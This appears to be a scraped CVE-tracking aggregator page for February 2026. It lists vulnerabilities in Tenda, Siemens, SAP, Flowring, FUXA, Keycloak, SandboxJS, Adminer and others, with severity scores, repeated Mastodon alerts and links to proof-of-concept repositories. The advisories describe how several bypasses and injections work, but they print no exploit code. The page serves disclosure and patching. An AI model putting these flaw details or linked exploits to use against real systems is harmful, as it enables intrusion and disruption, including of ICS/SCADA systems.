https://github.com/sastraadiwiguna-purpleeliteteaming/SASTRA-ADI-WIGUNA-CVE-2026-21858-Holistic-Audit

https://github.com/sec-dojo-com/CVE-2026-21858

https://github.com/bgarz929/Ashwesker-CVE-2026-21858

https://github.com/MOGMUNI/CVE-2026-21858

https://github.com/Alhakim88/CVE-2026-21858

https://github.com/SystemVll/CVE-2026-21858

https://github.com/Chocapikk/CVE-2026-21858

thehackerwire@mastodon.social at 2026-02-08T21:16:07.000Z ##

🟠 CVE-2026-2185 - High (8.8)

A flaw has been found in Tenda RX3 16.03.13.11. This issue affects the function set_device_name of the file /goform/setBlackRule of the component MAC Filtering Configuration Endpoint. This manipulation of the argument devName/mac causes stack-base...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25656
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:34

2 posts

A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user. This could allow an attacker to load malicious DLLs, potentially leading to arbitrary code execution with SYSTEM privileges.(ZDI-CAN-28108)

thehackerwire@mastodon.social at 2026-02-10T10:30:40.000Z ##

🟠 CVE-2026-25656 - High (7.8)

A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions &lt; V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:30:40.000Z ##

🟠 CVE-2026-25656 - High (7.8)

A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions &lt; V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23720
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:34

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T10:16:59.000Z ##

🟠 CVE-2026-23720 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:16:59.000Z ##

🟠 CVE-2026-23720 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25655
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:33

2 posts

A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user. This could allow an attacker to load malicious DLLs, potentially leading to arbitrary code execution with administrative privilege.(ZDI-CAN-28107)

thehackerwire@mastodon.social at 2026-02-10T10:30:30.000Z ##

🟠 CVE-2026-25655 - High (7.8)

A vulnerability has been identified in SINEC NMS (All versions &lt; V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:30:30.000Z ##

🟠 CVE-2026-25655 - High (7.8)

A vulnerability has been identified in SINEC NMS (All versions &lt; V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23719
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:28

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:01:38.000Z ##

🟠 CVE-2026-23719 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:01:38.000Z ##

🟠 CVE-2026-23719 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23718
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:28

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:01:29.000Z ##

🟠 CVE-2026-23718 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:01:29.000Z ##

🟠 CVE-2026-23718 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23716
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:28

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:00:57.000Z ##

🟠 CVE-2026-23716 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:00:57.000Z ##

🟠 CVE-2026-23716 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-40587
(7.6 HIGH)

EPSS: 0.04%

updated 2026-02-10T12:30:27

2 posts

A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authenticated remote attacker to conduct a stored cross-site scripting attack by creating specially crafted document titles that are later viewed by other users of the a

thehackerwire@mastodon.social at 2026-02-10T11:01:50.000Z ##

🟠 CVE-2025-40587 - High (7.6)

A vulnerability has been identified in Polarion V2404 (All versions &lt; V2404.5), Polarion V2410 (All versions &lt; V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:01:50.000Z ##

🟠 CVE-2025-40587 - High (7.6)

A vulnerability has been identified in Polarion V2404 (All versions &lt; V2404.5), Polarion V2410 (All versions &lt; V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23715
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T12:30:27

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:00:47.000Z ##

🟠 CVE-2026-23715 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:00:47.000Z ##

🟠 CVE-2026-23715 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2095
(9.8 CRITICAL)

EPSS: 0.17%

updated 2026-02-10T09:30:31

3 posts

Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.

offseq at 2026-02-10T09:00:32.600Z ##

🚨 CVE-2026-2095: CRITICAL auth bypass in all Flowring Agentflow versions. Remote attackers can impersonate any user — no patch available. Restrict access & monitor for abnormal logins. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-10T07:21:06.000Z ##

🔴 CVE-2026-2095 - Critical (9.8)

Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:21:06.000Z ##

🔴 CVE-2026-2095 - Critical (9.8)

Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2094
(8.8 HIGH)

EPSS: 0.08%

updated 2026-02-10T09:30:31

4 posts

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

thehackerwire@mastodon.social at 2026-02-10T07:30:05.000Z ##

🟠 CVE-2026-2094 - High (8.8)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:21:04.000Z ##

🟠 CVE-2026-2094 - High (8.8)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:30:05.000Z ##

🟠 CVE-2026-2094 - High (8.8)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:21:04.000Z ##

🟠 CVE-2026-2094 - High (8.8)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2097
(8.8 HIGH)

EPSS: 0.21%

updated 2026-02-10T09:30:31

6 posts

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

thehackerwire@mastodon.social at 2026-02-10T07:29:54.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:20:52.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:19:37.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:29:54.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:20:52.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:19:37.000Z ##

🟠 CVE-2026-2097 - High (8.8)

Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-11242
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-10T09:30:27

2 posts

Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.

thehackerwire@mastodon.social at 2026-02-10T09:52:31.000Z ##

🔴 CVE-2025-11242 - Critical (9.8)

Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T09:52:31.000Z ##

🔴 CVE-2025-11242 - Critical (9.8)

Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23689
(7.7 HIGH)

EPSS: 0.07%

updated 2026-02-10T06:30:44

2 posts

Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control parameter. This triggers prolonged loop execution that consumes excessive system resources, potentially rendering the system unavailable. Successful expl

thehackerwire@mastodon.social at 2026-02-10T04:21:12.000Z ##

🟠 CVE-2026-23689 - High (7.7)

Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:12.000Z ##

🟠 CVE-2026-23689 - High (7.7)

Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-11547
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T06:30:40

2 posts

AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.

thehackerwire@mastodon.social at 2026-02-10T06:17:52.000Z ##

🟠 CVE-2025-11547 - High (7.8)

AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T06:17:52.000Z ##

🟠 CVE-2025-11547 - High (7.8)

AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0509
(9.6 CRITICAL)

EPSS: 0.04%

updated 2026-02-10T06:30:39

7 posts

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integrity and availability, and no impact on the confidentiality of the application.

se38@nrw.social at 2026-02-10T10:07:11.000Z ##

3674774 - [CVE-2026-0509] Missing Authorization check in SAP NetWeaver Application Server #ABAP and ABAP Platform
me.sap.com/notes/3674774

##

offseq at 2026-02-10T04:30:31.125Z ##

🛡️ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 – 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-10T04:21:59.000Z ##

🔴 CVE-2026-0509 - Critical (9.6)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:13.000Z ##

🔴 CVE-2026-0509 - Critical (9.6)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-10T04:30:31.000Z ##

🛡️ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 – 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: radar.offseq.com/threat/cve-20 #OffSeq #SAP #CVE20260509 #infosec

##

thehackerwire@mastodon.social at 2026-02-10T04:21:59.000Z ##

🔴 CVE-2026-0509 - Critical (9.6)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:13.000Z ##

🔴 CVE-2026-0509 - Critical (9.6)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0490
(7.5 HIGH)

EPSS: 0.08%

updated 2026-02-10T06:30:39

2 posts

SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a high impact on the availability but no impact on the confidentiality and integrity.

thehackerwire@mastodon.social at 2026-02-10T04:22:09.000Z ##

🟠 CVE-2026-0490 - High (7.5)

SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:22:09.000Z ##

🟠 CVE-2026-0490 - High (7.5)

SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0488
(10.0 CRITICAL)

EPSS: 0.04%

updated 2026-02-10T06:30:38

3 posts

An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. This leads to a full database compromise with high impact on confidentiality, integrity, and availability.

offseq at 2026-02-10T06:00:40.827Z ##

🔥 CVE-2026-0488 (CVSS 9.9): CRITICAL auth bypass in SAP CRM & S/4HANA Scripting Editor. Authenticated users can run arbitrary SQL, risking full DB compromise. Patch fast, restrict access! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-10T04:21:30.000Z ##

🔴 CVE-2026-0488 - Critical (9.9)

An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:30.000Z ##

🔴 CVE-2026-0488 - Critical (9.9)

An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0485
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-10T06:30:38

2 posts

SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker could induce a persistent service disruption, rendering the CMS completely unavailable. Successful exploitation results in a high impact on availability, w

thehackerwire@mastodon.social at 2026-02-10T04:21:21.000Z ##

🟠 CVE-2026-0485 - High (7.5)

SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:21.000Z ##

🟠 CVE-2026-0485 - High (7.5)

SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25958
(7.7 HIGH)

EPSS: 0.01%

updated 2026-02-10T02:57:34

1 posts

### **Impact** It is possible to make a specially crafted request with a valid API token that leads to privilege escalation. ### Affected Versions: `≥= 0.27.19` ### Mitigation: Upgrade to a patched version: - 1.5.13 and later (regular release) - 1.4.2 (active [LTS release](https://cube.dev/docs/product/administration/distribution#long-term-support)) - 1.0.14 (end-of-life LTS release) ### *

thehackerwire@mastodon.social at 2026-02-09T23:22:53.000Z ##

🟠 CVE-2026-25958 - High (7.7)

Cube is a semantic layer for building data applications. From 0.27.19 to before 1.5.13, 1.4.2, and 1.0.14, it is possible to make a specially crafted request with a valid API token that leads to privilege escalation. This vulnerability is fixed in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25939(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-02-10T02:56:59

1 posts

### Summary An authorization bypass vulnerability in the FUXA allows an unauthenticated, remote attacker to create and modify arbitrary schedulers, exposing connected ICS/SCADA environments to follow-on actions. This vulnerability affects FUXA version 1.2.8 through version 1.2.10. This has been patched in FUXA version 1.2.11. ### Impact This affects all deployments, including those with `runtime.

1 repos

https://github.com/mbanyamer/CVE-2026-25939-SCADA-FUXA-Unauthenticated-Remote-Arbitrary

offseq at 2026-02-10T10:30:30.339Z ##

🔔 CVE-2026-25939: CRITICAL auth bypass in frangoteam FUXA (<1.2.11). Unauthenticated attackers can modify schedulers — risking ICS/SCADA disruption. Patch to 1.2.11+ now! radar.offseq.com/threat/cve-20

##

CVE-2026-25894(CVSS UNKNOWN)

EPSS: 0.23%

updated 2026-02-10T02:56:49

1 posts

### Description An insecure default configuration in FUXA allows an unauthenticated, remote attacker to gain administrative access and execute arbitrary code on the server. This affects FUXA through version 1.2.9 when authentication is enabled, but the administrator JWT secret is not configured. This issue has been patched in FUXA version 1.2.10. ### Impact The FUXA documentation allows administr

offseq at 2026-02-10T01:30:30.963Z ##

⚠️ CRITICAL: CVE-2026-25894 in frangoteam FUXA (<1.2.10) lets unauthenticated attackers forge admin JWT tokens & execute code. Patch to 1.2.10+, audit secrets, restrict access. Protect your ICS! radar.offseq.com/threat/cve-20

##

CVE-2026-25890
(8.1 HIGH)

EPSS: 0.03%

updated 2026-02-10T02:56:39

1 posts

### Summary An authenticated user can bypass the application's "Disallow" file path rules by modifying the request URL. By adding multiple slashes (e.g., //private/) to the path, the authorization check fails to match the rule, while the underlying filesystem resolves the path correctly, granting unauthorized access to restricted files. ### Details The vulnerability allows users to bypass "Disall

thehackerwire@mastodon.social at 2026-02-09T22:26:00.000Z ##

🟠 CVE-2026-25890 - High (8.1)

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, an authenticated user can bypass the application's "Disallow" file path rules by mo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25881
(9.1 CRITICAL)

EPSS: 0.05%

updated 2026-02-10T02:56:34

1 posts

### Summary A sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the `isGlobal` protection flag through array literal intermediaries. When a global prototype reference (e.g., `Map.prototype`, `Set.prototype`) is placed into an array and retrieved, the `isGlobal` taint is stripped, permitting direct prototype mutation from within the sandbox. This re

thehackerwire@mastodon.social at 2026-02-09T22:18:35.000Z ##

🔴 CVE-2026-25881 - Critical (9)

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25892
(7.5 HIGH)

EPSS: 0.06%

updated 2026-02-10T02:56:05

1 posts

### Summary Adminer v5.4.1 has a version check mechanism where `adminer.org` sends signed version info via JavaScript postMessage, which the browser then POSTs to `?script=version`. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST `version[]` parameter which PHP converts to an array. On next page load, `openssl_verify()` receives this array instead

thehackerwire@mastodon.social at 2026-02-09T22:16:42.000Z ##

🟠 CVE-2026-25892 - High (7.5)

Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint la...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1529
(8.1 HIGH)

EPSS: 0.02%

updated 2026-02-10T02:15:52.253000

1 posts

A flaw was found in Keycloak. An attacker can exploit this vulnerability by modifying the organization ID and target email within a legitimate invitation token's JSON Web Token (JWT) payload. This lack of cryptographic signature verification allows the attacker to successfully self-register into an unauthorized organization, leading to unauthorized access.

1 repos

https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

thehackerwire@mastodon.social at 2026-02-09T20:24:21.000Z ##

🟠 CVE-2026-1529 - High (8.1)

A flaw was found in Keycloak. An attacker can exploit this vulnerability by modifying the organization ID and target email within a legitimate invitation token's JSON Web Token (JWT) payload. This lack of cryptographic signature verification allow...

🔗 thehackerwire.com/vulnerabilit

